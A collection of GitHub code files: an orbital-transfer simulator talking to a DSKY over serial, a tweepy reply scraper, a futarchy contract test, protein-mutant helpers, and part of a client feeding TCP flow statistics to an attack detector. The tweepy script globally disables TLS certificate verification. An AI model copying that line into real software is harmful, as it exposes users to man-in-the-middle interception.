set_delta_vc1 = set_lunar_inject_vb\r\n set_lunar_inject_vb = False\r\n set_lunar_inject_va = False\r\n set_flags = False\r\n # print(\r\n # \"AGC PROGRAM {}: VC1={:.5f} VC2={:.5f} ACM={:.5f}\".format(\r\n # dsky_prog, target_vc1, target_vc2, acm\r\n # )\r\n # )\r\n\r\n tconn.set_text(r\"Connected\")\r\n tconn.set_color(\"springgreen\")\r\n\r\n past_prog = dsky_prog\r\n sleep(0.1)\r\n\r\n\r\nbtConn = serial\r\nprint(\"Creating Bluetooth SPP connection\")\r\ntry:\r\n btConn = serial.Serial(\"/dev/ttyS7\", 115200, timeout=10)\r\nexcept:\r\n print(\"Not connected\")\r\n tconn.set_text(r\"Disconnected\")\r\n tconn.set_color(\"red\")\r\nbtConn.flushInput()\r\n# sio = io.TextIOWrapper(io.BufferedRWPair(btConn, btConn, 1), encoding=\"utf-8\")\r\nserial_thread = th.Thread(target=spplistener, args=())\r\n\r\nserial_thread.start()\r\n\r\n\r\ndef set_orbits(event):\r\n global r\r\n global v\r\n global rm\r\n global vm\r\n global line1\r\n global line2\r\n global offset\r\n global reset\r\n anim.pause()\r\n ri = [sradius.val, 0]\r\n v_i_abs = np.sqrt(Mp * GG / ri[0])\r\n vm_i_abs = np.sqrt(Mp * GG / (rm_i[0]))\r\n # Initialization\r\n vi = [0, v_i_abs * 1.0]\r\n vmi = [0, vm_i_abs * 1.0]\r\n r = np.zeros([N, 2])\r\n v = np.zeros([N, 2])\r\n rm = np.zeros([N, 2])\r\n vm = np.zeros([N, 2])\r\n r[0, :] = ri\r\n v[0, :] = vi\r\n rm[0, :] = rm_i\r\n vm[0, :] = vmi\r\n offset = index + 1\r\n reset = True\r\n line1.set_color(\"#FDB813\")\r\n anim.resume()\r\n\r\n\r\ndef reset(event):\r\n set_orbits(event)\r\n\r\n\r\ndef homannn_transfer(event):\r\n global target_r2\r\n global theta1\r\n global theta2\r\n global delta_vc1\r\n global delta_vc2\r\n global acm\r\n global set_delta_vc1\r\n # current_dr = np.subtract(current_rm, current_rc)\r\n r1 = np.linalg.norm(current_rc)\r\n target_r2 = r2 = np.linalg.norm(current_rm)\r\n theta1 = arctan(current_rc)\r\n theta2 = arctan(current_rm)\r\n delta_vc1 = np.sqrt(GG * Mp / r1) * (np.sqrt(2.0 * r2 / (r1 + r2)) - 1.0)\r\n delta_vc2 = np.sqrt(GG * Mp / r2) * (-1.0 * np.sqrt(2.0 * r1 / (r1 + r2)) + 1.0)\r\n acm = np.pi * (1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0))\r\n print(\r\n \"R1:{:.5f} R2:{:.5f} Delta-V: {:.5f} then {:.5f} at {:.5f} rad\\n\".format(\r\n r1, target_r2, delta_vc1, delta_vc2, acm\r\n )\r\n )\r\n\r\n GGMp = GG * Mp / 10.0\r\n GGMl = GG * Ml / 10.0\r\n rr0 = 1.0 / (sfinalrad.val * 10.0)\r\n rr1 = 1.0 / (r1 * 10.0)\r\n rr2 = 1.0 / (r2 * 10.0)\r\n rr3 = 1.0 / (10.0 * (r1 + target_r2) / 2.0)\r\n va_sqr_2 = GGMp * rr1\r\n vb_sqr_2 = GGMp * rr2\r\n vatx_sqr = GGMp * (2 * rr1 - rr3)\r\n vbtx_sqr = GGMp * (2 * rr2 - rr3)\r\n\r\n print(\r\n \"GMp:{:.5f} 1/R1N:{:.5f} 1/R2N:{:.5f} ATX:{:.5f}\\nVa:{:.5f}({:.5f}) Vb:{:.5f}({:.5f}) Vatx:{:.5f}({:.5f}) Vbtx:{:.5f}({:.5f}) V-delta:{:.10f} -> {:.10f}\\n\".format(\r\n GGMp,\r\n rr1,\r\n rr2,\r\n rr3,\r\n va_sqr_2,\r\n np.sqrt(va_sqr_2),\r\n vb_sqr_2,\r\n np.sqrt(vb_sqr_2),\r\n vatx_sqr,\r\n np.sqrt(vatx_sqr),\r\n vbtx_sqr,\r\n np.sqrt(vbtx_sqr),\r\n np.sqrt(vatx_sqr) - np.sqrt(va_sqr_2),\r\n np.sqrt(vb_sqr_2) - np.sqrt(vbtx_sqr),\r\n )\r\n )\r\n print(\r\n \"Vbtx_L:{:.5f}({:.5f}) Vbtx_M:{:.5f}({:.5f}) arg:{:.5f}({:.5f},{:.5f})\\n\".format(\r\n np.sqrt(GGMp * rr0),\r\n GGMp * rr0,\r\n np.sqrt(GGMp * rr2),\r\n GGMp * rr2,\r\n 1.0 - np.sqrt(((r1 / r2) / 2.0 + 1.0 / 2.0) ** 3),\r\n ((r1 / r2) / 2.0 + 1.0 / 2.0) ** 3,\r\n ((r1 / r2) / 2.0 + 1.0 / 2.0),\r\n )\r\n )\r\n # print(\"GMp:{:.3f} 1/R1N:{:.3f} 1/R2N:{:.3f} ATX:{:.3f}\\nVa:{:.3f}({:.3f}) Vb:{:.3f}({:.3f}) Vatx:{:.3f}({:.3f}) Vbtx:{:.3f}({:.3f}) V-delta:{:.3f} -> {:.3f}\\n\"\\\r\n # .format(GGMp*(2**14), rr1*(2**14), rr2*(2**14), rr3*(2**14), va_sqr_2*(2**14), np.sqrt(va_sqr_2)*(2**14), vb_sqr_2*(2**14), np.sqrt(vb_sqr_2)*(2**14), vatx_sqr*(2**14), \\\r\n # np.sqrt(vatx_sqr)*(2**14), vbtx_sqr*(2**14), np.sqrt(vbtx_sqr)*(2**14), (np.sqrt(vatx_sqr)-np.sqrt(va_sqr_2))*(2**14), (np.sqrt(vb_sqr_2)-np.sqrt(vbtx_sqr))*(2**14)))\r\n # print(\"GMp: {} 1/R1N: {} 1/R2N: {} ATX: {}\\nVa: {}({}) Vb: {}({}) Vatx: {}({}) Vbtx: {}({}) V-delta: {} -> {}\\n\"\\\r\n # .format(int(np.round(GGMp*(2**14))), int(np.round(rr1*(2**14))), int(np.round(rr2*(2**14))), int(np.round(rr3*(2**14))), int(np.round(va_sqr_2*(2**14))), int(np.round(np.sqrt(va_sqr_2)*(2**14))),\\\r\n # int(np.round(vb_sqr_2*(2**14))), int(np.round(np.sqrt(vb_sqr_2)*(2**14))), int(np.round(vatx_sqr*(2**14))), int(np.round(np.sqrt(vatx_sqr)*(2**14))), int(np.round(vbtx_sqr*(2**14))), \\\r\n # int(np.round(np.sqrt(vbtx_sqr)*(2**14))), int(np.round((np.sqrt(vatx_sqr)-np.sqrt(va_sqr_2))*(2**14))), int(np.round((np.sqrt(vb_sqr_2)-np.sqrt(vbtx_sqr))*(2**14)))))\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 10 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n )\r\n )\r\n\r\n print(\r\n \"<+{:05f}+{:05f}+{:05f}+{:05f} 10 10 10 123 1234>\".format(\r\n (GGMp),\r\n (rr0),\r\n (rr2),\r\n (GGMl),\r\n )\r\n )\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 10 123 1234>\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr0 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(GGMl * (2**14))),\r\n )\r\n )\r\n print(\r\n \"Vm={:05d} Vp={:05d} V-d={:.5f}\".format(\r\n int(np.round(np.sqrt(GGMl * rr0) * (2**14))),\r\n int(np.round(np.sqrt(GGMp * rr2) * (2**14))),\r\n (np.sqrt(GGMp * rr0 + GGMp * rr2) - np.sqrt(vbtx_sqr)),\r\n )\r\n )\r\n print(\r\n \"GGMl={:5f} Vm={:5f} Vp={:5f} V-final={:.5f}\\n\".format(\r\n (GGMl),\r\n (np.sqrt(GGMl * rr0)),\r\n (np.sqrt(GGMp * rr2)),\r\n (np.sqrt(GGMp * rr0 + GGMp * rr2)),\r\n )\r\n )\r\n\r\n print(\r\n \"<+{:05f}+{:05f}+{:05f}+{:05f} 10 10 1 123 1234>\".format(\r\n (r1 / r2),\r\n (0),\r\n (0),\r\n (0),\r\n )\r\n )\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\".format(\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n )\r\n )\r\n print(\r\n \"result octal={:05o} result bef sqrt={:5f} result bef. minus={:.5f} result={:.5f}\".format(\r\n int(np.round((1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0)) * (2**14))),\r\n (r1 / r2) / 2 + 1 / 2,\r\n np.sqrt((r1 / r2 + 1) ** 3 / 8.0),\r\n 1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0),\r\n )\r\n )\r\n\r\n set_delta_vc1 = True\r\n\r\n\r\n# p.start()\r\n\r\n\r\ndef set_lunar_injection():\r\n global past_prog\r\n global set_lunar_inject\r\n global set_lunar_inject_va\r\n global set_lunar_inject_vb\r\n global btConn\r\n global set_flags\r\n\r\n r1 = np.linalg.norm(current_rc)\r\n target_r2 = r2 = np.linalg.norm(current_rm)\r\n\r\n if r1 == 0.0 or r2 == 0.0:\r\n return\r\n\r\n GGMp = GG * Mp / SIMAGCSCALE\r\n GGMl = GG * Ml / SIMAGCSCALE\r\n rr0 = 1.0 / (sfinalrad.val * SIMAGCSCALE)\r\n rr1 = 1.0 / (r1 * SIMAGCSCALE)\r\n rr2 = 1.0 / (r2 * SIMAGCSCALE)\r\n rr3 = 1.0 / (SIMAGCSCALE * (r1 + target_r2) / 2.0) # Apogee\r\n\r\n if (\r\n not set_lunar_inject\r\n and not set_lunar_inject_va\r\n and not set_lunar_inject_vb\r\n and past_prog != 4\r\n ):\r\n # print(\"Wrote first lunar inject\")\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n ).encode()\r\n )\r\n elif set_lunar_inject_va and not set_lunar_inject and not set_lunar_inject_vb:\r\n # print(\"Wrote second lunar inject\")\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr0 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(GGMl * (2**14))),\r\n ).encode()\r\n )\r\n elif set_lunar_inject_vb and set_lunar_inject_va and not set_lunar_inject:\r\n # print(\"Wrote third lunar inject\")\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n ).encode()\r\n )\r\n # set_flags = True\r\n # set_lunar_inject = True\r\n\r\n\r\ndef send_lunar(event):\r\n global set_flags\r\n global set_lunar_inject\r\n global set_delta_vc1\r\n global set_lunar_inject_vb\r\n global set_lunar_inject_va\r\n global counter\r\n global do_lunar_injection\r\n do_lunar_injection = True\r\n counter = 0\r\n set_lunar_inject = False\r\n set_delta_vc1 = False\r\n set_lunar_inject_vb = False\r\n set_lunar_inject_va = False\r\n set_lunar_injection()\r\n set_flags = True\r\n\r\n\r\ndef send_hohmann(event):\r\n global btConn\r\n global set_flags\r\n global do_lunar_injection\r\n do_lunar_injection = False\r\n r1 = np.linalg.norm(current_rc)\r\n target_r2 = r2 = stransfrad.val\r\n\r\n if r1 == 0.0 or r2 == 0.0:\r\n return\r\n\r\n GGMp = GG * Mp / SIMAGCSCALE\r\n rr1 = 1.0 / (r1 * SIMAGCSCALE)\r\n rr2 = 1.0 / (r2 * SIMAGCSCALE)\r\n rr3 = 1.0 / (SIMAGCSCALE * (r1 + target_r2) / 2.0) # Apogee\r\n\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n ).encode()\r\n )\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n )\r\n )\r\n set_flags = True\r\n\r\n # target_r2 = r2 = 5\r\n # va_sqr_2 = GGMp * rr1\r\n # vb_sqr_2 = GGMp * rr2\r\n # vatx_sqr = GGMp * (2 * rr1 - rr3)\r\n # vbtx_sqr = GGMp * (2 * rr2 - rr3)\r\n # acm = np.pi * (1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0))\r\n # print(\r\n # \"Lunar R1:{:.5f} R2:{:.5f} Delta-V: {:.5f} then {:.5f} at {:.5f} rad\".format(\r\n # r1,\r\n # r2,\r\n # np.sqrt(vatx_sqr) * SIMAGCSCALE,\r\n # np.sqrt(vbtx_sqr) * SIMAGCSCALE,\r\n # acm,\r\n # )\r\n # )\r\n # target_r2 = r2 = stransfrad.val\r\n # va_sqr_2 = GGMp * rr1\r\n # vb_sqr_2 = GGMp * rr2\r\n # vatx_sqr = GGMp * (2 * rr1 - rr3)\r\n # vbtx_sqr = GGMp * (2 * rr2 - rr3)\r\n # acm = np.pi\r\n # print(\r\n # \"Hohmann R1:{:.5f} R2:{:.5f} Vatx: {:.5f} then Vbtx {:.5f} at {:.5f} rad\".format(\r\n # r1,\r\n # r2,\r\n # (np.sqrt(vatx_sqr) - np.sqrt(va_sqr_2)) * SIMAGCSCALE,\r\n # np.sqrt(vb_sqr_2) - np.sqrt(vbtx_sqr) * SIMAGCSCALE,\r\n # acm,\r\n # )\r\n # )\r\n\r\n # delta_vc1 = np.sqrt(GG * Mp / r1) * (np.sqrt(2.0 * r2 / (r1 + r2)) - 1.0)\r\n # delta_vc2 = np.sqrt(GG * Mp / r2) * (-1.0 * np.sqrt(2.0 * r1 / (r1 + r2)) + 1.0)\r\n # acm = np.pi * (1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0))\r\n # print(\r\n # \"R1:{:.5f} R2:{:.5f} Delta-V: {:.5f} then {:.5f} at {:.5f} rad\\n\".format(\r\n # r1, target_r2, delta_vc1, delta_vc2, acm\r\n # )\r\n # )\r\n\r\n\r\nresetax = py.axes([0.78, 0.37, 0.07, 0.04])\r\nbuttonrst = Button(resetax, \"Reset\", hovercolor=\"gray\", color=\"black\")\r\nbuttonrst.on_clicked(reset)\r\n\r\nsetax = py.axes([0.70, 0.37, 0.07, 0.04])\r\nbuttonsethohm = Button(setax, \"Hohmann\", hovercolor=\"gray\", color=\"black\")\r\nbuttonsethohm.on_clicked(send_hohmann)\r\n\r\nsetax = py.axes([0.62, 0.37, 0.07, 0.04])\r\nbuttonsetlunar = Button(setax, \"Lunar Inject\", hovercolor=\"gray\", color=\"black\")\r\nbuttonsetlunar.on_clicked(send_lunar)\r\n\r\n\r\nsradius.on_changed(set_orbits)\r\n\r\nrax = py.axes([0.60, 0.65, 0.3, 0.2], facecolor=\"#1a1a1a\")\r\nradio = RadioButtons(\r\n rax,\r\n (\"Luna - Earth\", \"Phobos - Mars\", \"Europa - Jupiter\", \"Titan - Saturn\"),\r\n active=0,\r\n activecolor=\"white\",\r\n)\r\n\r\nfig.set_dpi(156)\r\n\r\npy.show()\r\n","repo_name":"Absolute0K/DSKY-firmware","sub_path":"AGC Simulation.py","file_name":"AGC Simulation.py","file_ext":"py","file_size_in_byte":29502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29191466426","text":"import csv\nimport tweepy\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Oauth keys\nconsumer_key = \"XXX\"\nconsumer_secret = \"XXX\"\naccess_token = \"XXX\"\naccess_token_secret = \"XXX\"\n\n# Authentication with Twitter\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\n# update these for the tweet you want to process replies to 'name' = the account username and you can find the tweet id within the tweet URL\nname = 'LunarCRUSH'\ntweet_id = '1270923526690664448'\n\nreplies=[]\nfor tweet in tweepy.Cursor(api.search,q='to:'+name, result_type='recent', timeout=999999).items(1000):\n if hasattr(tweet, 'in_reply_to_status_id_str'):\n if (tweet.in_reply_to_status_id_str==tweet_id):\n replies.append(tweet)\n\nwith open('replies_clean.csv', 'w') as f:\n csv_writer = csv.DictWriter(f, fieldnames=('user', 'text'))\n csv_writer.writeheader()\n for tweet in replies:\n row = {'user': tweet.user.screen_name, 'text': tweet.text.replace('\\n', ' ')}\n csv_writer.writerow(row)\n","repo_name":"nirholas/Get-Tweet-Replies-With-Python-Tweepy","sub_path":"twitter_reply.py","file_name":"twitter_reply.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"35"} +{"seq_id":"12933117179","text":"from ..abstract_test import AbstractTestContract, accounts, keys, TransactionFailed\nfrom ethereum import tester as t\n\n\nclass TestContract(AbstractTestContract):\n \"\"\"\n run test with python -m unittest contracts.tests.oracles.test_futarchy_oracle\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(TestContract, self).__init__(*args, **kwargs)\n self.math = self.create_contract('Utils/Math.sol')\n self.event_factory = self.create_contract('Events/EventFactory.sol', libraries={'Math': self.math})\n self.centralized_oracle_factory = self.create_contract('Oracles/CentralizedOracleFactory.sol')\n self.market_factory = self.create_contract('Markets/DefaultMarketFactory.sol')\n self.futarchy_factory = self.create_contract('Oracles/FutarchyOracleFactory.sol', params=[self.event_factory])\n self.lmsr = self.create_contract('MarketMakers/LMSRMarketMaker.sol', libraries={'Math': self.math})\n self.ether_token = self.create_contract('Tokens/EtherToken.sol', libraries={'Math': self.math})\n self.token_abi = self.create_abi('Tokens/AbstractToken.sol')\n self.market_abi = self.create_abi('Markets/DefaultMarket.sol')\n self.event_abi = self.create_abi('Events/AbstractEvent.sol')\n self.oracle_abi = self.create_abi('Oracles/CentralizedOracle.sol')\n self.futarchy_abi = self.create_abi('Oracles/FutarchyOracle.sol')\n\n def test(self):\n t.gas_limit = 4712388*4 # Creation gas costs are above gas limit!!!\n # Create futarchy oracle\n description_hash = \"d621d969951b20c5cf2008cbfc282a2d496ddfe75a76afe7b6b32f1470b8a449\".decode('hex')\n oracle = self.contract_at(self.centralized_oracle_factory.createCentralizedOracle(description_hash), self.oracle_abi)\n fee = 50000 # 5%\n lower = -100\n upper = 100\n deadline = self.s.block.timestamp + 60*60 # in 1h\n creator = 0\n profiling = self.futarchy_factory.createFutarchyOracle(self.ether_token.address, oracle.address, 2, lower, upper,\n self.market_factory.address, self.lmsr.address, fee,\n deadline, sender=keys[creator], profiling=True)\n self.assertLess(profiling['gas'], 10000000)\n futarchy = self.contract_at(profiling['output'], self.futarchy_abi)\n categorical_event = self.contract_at(futarchy.categoricalEvent(), self.event_abi)\n # Fund markets\n collateral_token_count = 10**18\n self.ether_token.deposit(value=collateral_token_count, sender=keys[creator])\n self.assertEqual(self.ether_token.balanceOf(accounts[creator]), collateral_token_count)\n self.ether_token.approve(futarchy.address, collateral_token_count, sender=keys[creator])\n futarchy.fund(collateral_token_count, sender=keys[creator])\n # Buy into market for outcome token 1\n market = self.contract_at(futarchy.markets(1), self.market_abi)\n buyer = 1\n outcome = 0\n token_count = 10 ** 15\n outcome_token_costs = self.lmsr.calcCosts(market.address, outcome, token_count)\n fee = market.calcMarketFee(outcome_token_costs)\n costs = outcome_token_costs + fee\n # Buy all outcomes\n self.ether_token.deposit(value=costs, sender=keys[buyer])\n self.ether_token.approve(categorical_event.address, costs, sender=keys[buyer])\n categorical_event.buyAllOutcomes(costs, sender=keys[buyer])\n collateral_token = self.contract_at(categorical_event.outcomeTokens(1), self.token_abi)\n collateral_token.approve(market.address, costs, sender=keys[buyer])\n self.assertEqual(market.buy(outcome, token_count, costs, sender=keys[buyer]), costs)\n # Set outcome of futarchy oracle\n self.assertRaises(TransactionFailed, futarchy.setOutcome)\n self.s.block.timestamp = deadline\n futarchy.setOutcome()\n self.assertTrue(futarchy.isOutcomeSet())\n self.assertEqual(futarchy.getOutcome(), 1)\n categorical_event.setWinningOutcome()\n # Set winning outcome for scalar events\n self.assertRaises(TransactionFailed, futarchy.close)\n oracle.setOutcome(50)\n scalar_event = self.contract_at(market.eventContract(), self.event_abi)\n scalar_event.setWinningOutcome()\n # Close winning market and transfer collateral tokens to creator\n futarchy.close(sender=keys[creator])\n self.assertGreater(self.ether_token.balanceOf(accounts[creator]), collateral_token_count)\n","repo_name":"SachGupta/gnosis-contracts","sub_path":"contracts/tests/oracles/test_futarchy_oracle.py","file_name":"test_futarchy_oracle.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"5224782299","text":"from typing import List, Tuple\nimport re\nfrom itertools import product, zip_longest\nimport pandas as pd\nimport numpy as np\n\n_FASTA_VOCAB = \"ARNDCQEGHILKMFPSTWYV\"\n\n\ndef single_mutant_names(sequence: str) -> List[str]:\n \"\"\"Returns the names of all single mutants of a sequence.\"\"\"\n mutants = []\n for (i, wt), mut in product(enumerate(sequence), _FASTA_VOCAB):\n if wt == mut:\n continue\n mutant = f\"{wt}{i + 1}{mut}\"\n mutants.append(mutant)\n return mutants\n\n\ndef split_mutant_name(mutant: str) -> Tuple[str, int, str]:\n \"\"\"Splits a mutant name into the wildtype, position, and mutant.\"\"\"\n return mutant[0], int(mutant[1:-1]), mutant[-1]\n\n\ndef make_mutation(sequence: str, mutant: str, start_ind: int = 1) -> str:\n \"\"\"Makes a mutation on a particular sequence. Multiple mutations may be separated\n by ',', ':', or '+', characters.\n \"\"\"\n delimiters = [\",\", r\"\\+\", \":\"]\n expression = re.compile(\"|\".join(delimiters))\n if mutant.upper() == \"WT\":\n return sequence\n if expression.search(mutant):\n mutants = expression.split(mutant)\n for mutant in mutants:\n sequence = make_mutation(sequence, mutant)\n return sequence\n else:\n wt, pos, mut = split_mutant_name(mutant)\n assert sequence[pos - start_ind] == wt\n return sequence[: pos - start_ind] + mut + sequence[pos - start_ind + 1 :]\n\n\ndef create_mutant_df(sequence: str) -> pd.DataFrame:\n \"\"\"Create a dataframe with mutant names and sequences\"\"\"\n names = [\"WT\"] + single_mutant_names(sequence)\n sequences = [sequence] + [make_mutation(sequence, mut) for mut in names[1:]]\n return pd.DataFrame({\"mutant\": names, \"sequence\": sequences})\n\n\ndef seqdiff(seq1: str, seq2: str) -> str:\n diff = []\n for aa1, aa2 in zip_longest(seq1, seq2, fillvalue=\"-\"):\n if aa1 == aa2:\n diff.append(\" \")\n else:\n diff.append(\"|\")\n out = f\"{seq1}\\n{''.join(diff)}\\n{seq2}\"\n return out\n\n\ndef to_pivoted_mutant_df(df: pd.DataFrame) -> pd.DataFrame:\n df[\"wt_aa\"] = df[\"mutant\"].str.get(0)\n df[\"mut_aa\"] = df[\"mutant\"].str.get(-1)\n df[\"Position\"] = df[\"mutant\"].str.slice(1, -1).astype(int)\n df = df.drop(columns=\"mutant\").pivot(\n index=\"mut_aa\", columns=[\"Position\", \"wt_aa\"]\n )\n df = df.loc[list(_FASTA_VOCAB)]\n return df\n\n\ndef pivoted_mutant_df(sequence: str, scores: np.ndarray) -> pd.DataFrame:\n index = pd.Index(list(_FASTA_VOCAB), name=\"mut_aa\")\n columns = pd.MultiIndex.from_arrays(\n [list(range(1, len(sequence) + 1)), list(sequence)], names=[\"Position\", \"wt_aa\"]\n )\n df = pd.DataFrame(\n data=scores,\n index=index,\n columns=columns,\n )\n return df\n","repo_name":"yikunpku/RNA-MSM","sub_path":"utils/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"15412799535","text":"import logging\nfrom sys import stdout\nimport sys \nimport os \nimport time\nimport signal\nimport grpc\nimport subprocess\nfrom l3_centralizedattackdetector_pb2_grpc import (\n L3CentralizedattackdetectorStub,\n)\nfrom l3_centralizedattackdetector_pb2 import (\n ModelInput,\n)\n\n# Setup loggers ===============================\nlogger = logging.getLogger('dad_logger')\nlogger.setLevel(logging.INFO)\nlogFormatter = logging.Formatter(fmt='%(levelname)-8s %(message)s')\nconsoleHandler = logging.StreamHandler(stdout)\nconsoleHandler.setFormatter(logFormatter)\nlogger.addHandler(consoleHandler)\n# ==================================\n\nTSTAT_DIR_NAME = \"piped/\"\nCENTRALIZED_ATTACK_DETECTOR = \"localhost:10001\"\nJSON_BLANK = {\n \"ip_o\": \"\", # Client IP\n \"port_o\": \"\", # Client port\n \"ip_d\": \"\", # Server ip\n \"port_d\": \"\", # Server port\n \"flow_id\": \"\", # Identifier:c_ip,c_port,s_ip,s_port,time_start\n \"protocol\": \"\", # Connection protocol\n \"time_start\": 0, # Start of connection\n \"time_end\": 0, # Time of last packet\n}\nMSG = 0\nSTOP = False\n\ndef handler(signum, frame):\n global STOP\n if STOP:\n exit()\n STOP = True\n logger.info(\"Gracefully Stopping...\")\nsignal.signal(signal.SIGINT, handler)\n\ndef follow(thefile, time_sleep):\n \"\"\"\n Generator function that yields new lines in a file\n It reads the logfie (the opened file)\n \"\"\"\n # seek the end of the file\n thefile.seek(0, os.SEEK_END)\n\n trozo = \"\"\n # start infinite loop\n while True:\n # read last line of file\n line = thefile.readline()\n # sleep if file hasn't been updated\n if not line:\n time.sleep(time_sleep)\n continue\n if line[-1] != \"\\n\":\n trozo += line\n else:\n if trozo != \"\":\n line = trozo + line\n trozo = \"\"\n yield line\n\ndef load_file(dirname=TSTAT_DIR_NAME): # - Client side -\n while True:\n here = os.path.dirname(os.path.abspath(__file__))\n tstat_piped = os.path.join(here, dirname)\n tstat_dirs = os.listdir(tstat_piped)\n if len(tstat_dirs) > 0:\n tstat_dirs.sort()\n new_dir = tstat_dirs[-1]\n tstat_file = tstat_piped + new_dir + \"/log_tcp_temp_complete\"\n logger.info(\"Following: {0}\".format(tstat_file))\n return tstat_file\n else:\n logger.info(\"No tstat directory!\")\n time.sleep(5)\n\ndef process_line(line):\n \"\"\"\n - Preprocessing before a message per line\n - Avoids crash when nan are found by generating a 0s array\n - Returns a list of values\n \"\"\"\n def makeDivision(i, j): #Helper function\n return i / j if (j and type(i) != str and type(j) != str) else 0\n\n line = line.split(\" \")\n try:\n n_packets_server, n_packets_client = float(line[16]), float(line[2])\n except:\n return [0 for i in range(9)]\n \n n_bits_server, n_bits_client = float(line[22])*8, float(line[8])*8\n seconds = float(line[30]) # Duration in s\n values = [\n makeDivision(n_packets_server, seconds),\n makeDivision(n_packets_client, seconds),\n makeDivision(n_bits_server, seconds),\n makeDivision(n_bits_client, seconds),\n makeDivision(n_bits_server, n_packets_server),\n makeDivision(n_bits_client, n_packets_client),\n makeDivision(n_packets_server, n_packets_client),\n makeDivision(n_bits_server, n_bits_client),\n ]\n \n return values\n\ndef open_channel():\n with grpc.insecure_channel(CENTRALIZED_ATTACK_DETECTOR) as channel:\n stub = L3CentralizedattackdetectorStub(channel)\n logger.info(\"{0}\".format(stub.SendInput(run())))\n\ndef run():\n filename = load_file()\n logfile = open(filename, \"r\")\n loglines = follow(logfile, 5)\n \n new_connections = {} # Dict for storing NEW data\n connections_db = {} # Dict for storing ALL data\n \n process_time = []\n global MSG\n global STOP\n for line in loglines:\n if STOP:\n break\n MSG += 1\n start = time.time()\n line_id = line.split(\" \")\n conn_id = (line_id[0], line_id[1], line_id[14], line_id[15])\n new_connections[conn_id] = process_line(line)\n try:\n connections_db[conn_id][\"time_end\"] = time.time()\n except KeyError:\n connections_db[conn_id] = JSON_BLANK.copy()\n connections_db[conn_id][\"time_start\"] = time.time()\n connections_db[conn_id][\"time_end\"] = time.time()\n connections_db[conn_id][\"ip_o\"] = conn_id[0]\n connections_db[conn_id][\"port_o\"] = conn_id[1]\n connections_db[conn_id][\"flow_id\"] = \":\".join(conn_id)\n connections_db[conn_id][\"protocol\"] = \"TCP\"\n connections_db[conn_id][\"ip_d\"] = conn_id[2]\n connections_db[conn_id][\"port_d\"] = conn_id[3]\n\n # CRAFT DICT\n inference_information = {\n \"n_packets_server_seconds\": new_connections[conn_id][0],\n \"n_packets_client_seconds\": new_connections[conn_id][1],\n \"n_bits_server_seconds\": new_connections[conn_id][2],\n \"n_bits_client_seconds\": new_connections[conn_id][3],\n \"n_bits_server_n_packets_server\": new_connections[conn_id][4],\n \"n_bits_client_n_packets_client\": new_connections[conn_id][5],\n \"n_packets_server_n_packets_client\": new_connections[conn_id][6],\n \"n_bits_server_n_bits_client\": new_connections[conn_id][7],\n \"ip_o\": connections_db[conn_id][\"ip_o\"],\n \"port_o\": connections_db[conn_id][\"port_o\"],\n \"ip_d\": connections_db[conn_id][\"ip_d\"],\n \"port_d\": connections_db[conn_id][\"port_d\"],\n \"flow_id\": connections_db[conn_id][\"flow_id\"],\n \"protocol\": connections_db[conn_id][\"protocol\"],\n \"time_start\": connections_db[conn_id][\"time_start\"],\n \"time_end\": connections_db[conn_id][\"time_end\"],\n }\n\n process_time.append(time.time() - start)\n if MSG % 1000 == 0:\n logger.info(\"Lineas: {0}- Tiempo Medio Procesado: {1}\".format(MSG, sum(process_time)/MSG))\n \n yield 